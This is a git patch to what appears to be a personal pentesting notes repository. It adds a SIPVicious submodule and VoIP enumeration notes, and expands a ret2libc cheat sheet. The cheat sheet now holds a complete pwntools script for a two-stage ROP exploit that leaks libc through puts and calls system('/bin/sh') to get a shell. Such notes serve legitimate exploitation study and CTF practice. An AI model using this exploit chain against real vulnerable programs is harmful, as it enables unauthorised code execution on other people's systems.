From d17d9c6b5cc0ec3ca41011bce1f4bf11cde72f19 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 27 Jan 2022 00:43:24 +0100 Subject: [PATCH] bump --- .gitmodules | 3 ++ exploit/binaries/ret2libc.md | 73 +++++++++++++++++++++++++++++++- telecommunications/sipvicious | 1 + telecommunications/sipvicious.md | 7 +++ 4 files changed, 83 insertions(+), 1 deletion(-) create mode 160000 telecommunications/sipvicious create mode 100644 telecommunications/sipvicious.md diff --git a/.gitmodules b/.gitmodules index 8f50a98..3791fbb 100644 --- a/.gitmodules +++ b/.gitmodules @@ -103,3 +103,6 @@ [submodule "exploit/windows/CrackMapExec"] path = exploit/windows/CrackMapExec url = https://github.com/byt3bl33d3r/CrackMapExec.git +[submodule "telecommunications/sipvicious"] + path = telecommunications/sipvicious + url = https://github.com/EnableSecurity/sipvicious.git diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md index caf40c8..912b5d9 100644 --- a/exploit/binaries/ret2libc.md +++ b/exploit/binaries/ret2libc.md @@ -1,8 +1,23 @@ # Ret2libc +* Check binary via + * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got + * `file` +* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space` + * Off = 0 + * Partial = 1 + * Full = 2 +* `got` contains dynamically loaded functions +* `plt` contains used loaded dynamical functions -## Finding offsets +## Finding something to execute +* Interesting stuff to call from inside libc + * `/bin/sh` + * `system` +## libc -- Finding Offsets + +### Manually * On target find `sh` address inside libc ```sh strings -a -t x /lib32/libc.so.6 | grep /bin/sh @@ -11,3 +26,59 @@ strings -a -t x /lib32/libc.so.6 | grep /bin/sh ```sh readelf -s /lib32/libc.so.6 | grep system ``` + +### Measure the Buffer +* With gef + * `create pattern` + * `run` + * Use pattern + * `pattern search $` + +## ROP -- Creating a Chain + +* Creating a ROP chain to execute the `/bin/sh` with parameters +* Check + * Architecture + * Calling convention + +## Usage +* Create context +```python +#!/usr/bin/env python3 + +from pwn import * + +context.binary = binary = '' +elf = ELF(binary) +rop = ROP(elf) +libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') +p = process() + +# ROP I, needed when ASL is enabled +payload = b'A' * 18 +payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0]) +payload += p64(elf.got.gets) +payload += p64(elf.plt.puts) +payload += p64(elf.symbols.main) + +p.recvline() +p.sendline(payload) +p.recvline() +leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement +p.recvline() + +log.info(f"gets: {hex(leak)}") +libc.address = leak - libc.symbols.gets +log.info(f"libc address: {hex(libc.address)}") # start address should be aligned + +# ROP II +payload = b'A' * 18 +payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0]) +payload += p64(next(libc.search(b'/bin/sh'))) +payload += p64(rop.find_gadget(['ret'])[0]) +payload += p64(libc.symbols.system) + +p.sendline(payload) +p.recvline() +p.interactive() +``` diff --git a/telecommunications/sipvicious b/telecommunications/sipvicious new file mode 160000 index 0000000..db051d8 --- /dev/null +++ b/telecommunications/sipvicious @@ -0,0 +1 @@ +Subproject commit db051d8845a11ae458acc79cf5104cef28dc3f25 diff --git a/telecommunications/sipvicious.md b/telecommunications/sipvicious.md new file mode 100644 index 0000000..bca3aa5 --- /dev/null +++ b/telecommunications/sipvicious.md @@ -0,0 +1,7 @@ +# Sipvicious + +* [Enable Security](https://github.com/EnableSecurity/sipvicious.git) + +# Enumeration +* Check which PBX is used via `svmap $TARGET_IP` +* Use `msf6 auxiliary(voip/asterisk_login)`